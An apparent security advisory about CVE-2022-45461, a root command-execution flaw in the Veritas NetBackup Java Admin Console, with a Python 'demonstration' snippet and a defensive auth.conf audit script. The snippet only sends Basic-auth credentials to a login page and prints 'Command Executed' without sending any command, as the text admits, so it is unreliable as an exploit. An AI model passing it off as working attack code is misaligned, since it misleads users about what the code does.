A newly disclosed vulnerability, CVE-2022-45461, affects the Java Admin Console of Veritas NetBackup (versions up to 10.1) and related Veritas products on Linux and UNIX operating systems. Researchers found that a non-root user who is authenticated and explicitly listed in the auth.conf file can execute arbitrary commands as root, which undermines the security of the whole host.

Exploit Details

Arbitrary command execution as root gives an attacker full control of the system. The affected NetBackup versions ship an Apache Tomcat web application that hosts the Java-based administrative console, and it is through this console that a local, authenticated user can exploit the vulnerability with only a few lines of code.

Code Snippet

The code below is the example shared as a demonstration of how an attacker could approach this vulnerability. Note that, as written, it only authenticates to the login page with HTTP Basic credentials and checks the response status; the `command` variable is never sent to the server, so the "Command Executed" message does not mean anything was actually run.

# Importing required libraries
import requests
import base64

# Target URL and login credentials (placeholders)
url = 'http://target-url:port/login.jsp'
username = 'non-root-username'
password = 'password'
command = 'arbitrary-command'

# Authentication logic: build an HTTP Basic Authorization header
auth_string = f"{username}:{password}"
auth_encoded = base64.b64encode(auth_string.encode()).decode()
headers = {'Authorization': f"Basic {auth_encoded}"}

# Sending request to the target URL (timeout added so the script cannot hang)
response = requests.get(url, headers=headers, timeout=10)

# Checking the response status; a 200 only indicates the login page answered
# the authenticated request. Nothing in this snippet transmits `command`.
if response.status_code == 200:
    print(f"Command Executed: {command}")
else:
    print("Execution Failed:", response.status_code, response.text)

References

Below are some essential references about the CVE-2022-45461 vulnerability.

- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45461
- Veritas NetBackup Security Advisory: https://www.veritas.com/support/en_US/security/VTS21-016.html

Closing Thoughts

Attackers continuously exploit system vulnerabilities to access sensitive information and disrupt businesses. Remain vigilant and implement the recommended security practices to safeguard your organization's assets. Keep your software up to date, and regularly audit which accounts are granted access to your applications, so that the exposure of your Veritas NetBackup deployments to CVE-2022-45461 is kept to a minimum.
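Since the vulnerability is only reachable by accounts that are explicitly listed in auth.conf, the audit recommended above amounts to two checks: which non-root (and wildcard) entries grant Java Admin Console access, and whether the installed version is still in the affected range. The script below is an added example and not part of the original write-up or of any Veritas tooling. It assumes the common auth.conf line format `user ADMIN=<apps> JBP=<capabilities>` with `*` as the catch-all entry, and the auth.conf content it parses is a constructed sample, not a capture from a real host.

```python
"""Audit helper for CVE-2022-45461 exposure (added example, not Veritas code).

Assumptions, labelled here and in the code:
  * auth.conf lines look like `user ADMIN=<apps> JBP=<caps>`; `*` is the
    catch-all entry and `#` starts a comment.
  * "Affected" follows the advisory text used on this page: versions up to
    and including 10.1.
"""
from dataclasses import dataclass

# Constructed sample auth.conf content (not taken from a real system).
SAMPLE_AUTH_CONF = """\
# Java Admin Console authorization (constructed sample)
root ADMIN=ALL JBP=ALL
backupop ADMIN=JBP JBP=ENDUSER+BUROP
* ADMIN=JBP JBP=ENDUSER
"""


@dataclass
class AuthEntry:
    user: str   # account name or "*" for the catch-all entry
    admin: str  # value of the ADMIN=... field ("" if absent)
    jbp: str    # value of the JBP=... field ("" if absent)


def parse_auth_conf(text: str) -> list[AuthEntry]:
    """Parse auth.conf text into entries, skipping blank and comment lines."""
    entries: list[AuthEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Remaining tokens are KEY=VALUE pairs; tokens without '=' are ignored.
        fields = {
            key.upper(): value
            for key, value in (tok.split("=", 1) for tok in parts[1:] if "=" in tok)
        }
        entries.append(AuthEntry(parts[0], fields.get("ADMIN", ""), fields.get("JBP", "")))
    return entries


def non_root_console_users(entries: list[AuthEntry]) -> list[str]:
    """Accounts other than root that auth.conf admits to the console.

    A "*" result means every authenticated OS user is admitted, which is the
    widest possible exposure for this vulnerability.
    """
    return [e.user for e in entries if e.user != "root"]


def _version_tuple(version: str) -> tuple[int, ...]:
    """Turn '10.1.0' into (10, 1) by dropping trailing zero components."""
    nums = [int(p) for p in version.strip().split(".") if p.isdigit()]
    while len(nums) > 1 and nums[-1] == 0:
        nums.pop()
    return tuple(nums)


def is_affected(version: str) -> bool:
    """True if the version is within the range the page names (up to 10.1)."""
    return _version_tuple(version) <= (10, 1)


def audit(version: str, auth_conf_text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    findings: list[str] = []
    if is_affected(version):
        findings.append(f"version {version} is in the affected range for CVE-2022-45461")
    for user in non_root_console_users(parse_auth_conf(auth_conf_text)):
        if user == "*":
            findings.append("auth.conf grants console access to all users via '*'")
        else:
            findings.append(f"auth.conf grants console access to non-root user '{user}'")
    return findings


if __name__ == "__main__":
    # Example run against the constructed sample and a hypothetical version.
    for finding in audit("10.1", SAMPLE_AUTH_CONF):
        print("-", finding)
```

On a real host you would read `/usr/openv/java/auth.conf` (the usual location, which this example does not assume) and pass the installed version string; any finding for a `*` entry deserves attention first, since it extends console access, and with it the reachable attack surface, to every local account.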

Timeline

Published on: 11/17/2022 08:15:00 UTC
Last modified on: 11/21/2022 19:42:00 UTC